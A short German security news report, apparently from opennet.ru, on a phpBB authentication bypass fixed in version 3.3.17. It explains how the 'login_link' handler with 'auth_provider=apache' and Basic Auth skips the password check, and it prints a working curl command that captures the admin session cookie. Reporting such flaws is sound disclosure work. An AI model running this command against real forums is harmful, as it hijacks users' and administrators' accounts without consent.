Im Open-Source-Forum-Software phpBB wurde eine SicherheitsanfĂ€lligkeit entdeckt, die es ermöglicht, sich durch das Senden einer einzigen HTTP-Anfrage mit der Sitzung eines beliebigen Forum-Nutzers zu verbinden. Die Schwachstelle tritt in der standardmĂ€Ăigen phpBB-Konfiguration auf. Das Problem wurde in der Version phpBB 3.3.17 behoben.
Bei einem Angriff auf normale Nutzer kann auf private Nachrichten zugegriffen werden und es besteht die Möglichkeit, Nachrichten im Namen des Nutzers zu senden. Bei einem Angriff auf Moderatoren und Administratoren können fremde Nachrichten gelöscht und IP-Adressen E-Mails eingesehen, private Nachrichten gelesen werden, jedoch kann nicht auf das Administrationsinterface zugegriffen werden und kein Zugriff auf den Host erhalten werden.
Details zur SicherheitsanfĂ€lligkeit werden nicht bereitgestellt, aber mithilfe von KI wurde bereits eine Exploit-Methode wiederhergestellt, die auf dem Aufruf des Handlers âlogin_linkâ basiert, bei dem die Authentifizierungsmethode âauth_provider=apacheâ festgelegt wird und der Login ĂŒber Basic Auth substituiert wird. Daraufhin setzt PHP die Umgebungsvariable âPHP_AUTH_USER=loginâ, und phpBB extrahiert daraus den Benutzernamen, ohne das Passwort zu ĂŒberprĂŒfen. Zum Beispiel kann der Session-Identifier des Nutzers admin erhalten und in der Datei cookies.txt gespeichert werden, indem folgender Code ausgefĂŒhrt wird:
curl -i -s \
-c cookies.txt \
-b cookies.txt \
-u âadmin:anythingâ \
-d âlogin=Login&login_username=admin&login_password=anythingâ \
âhttps://target.example/forum/ucp.php?mode=login_link&auth_provider=apache&login_link_any=1â
Quelle: opennet.ru
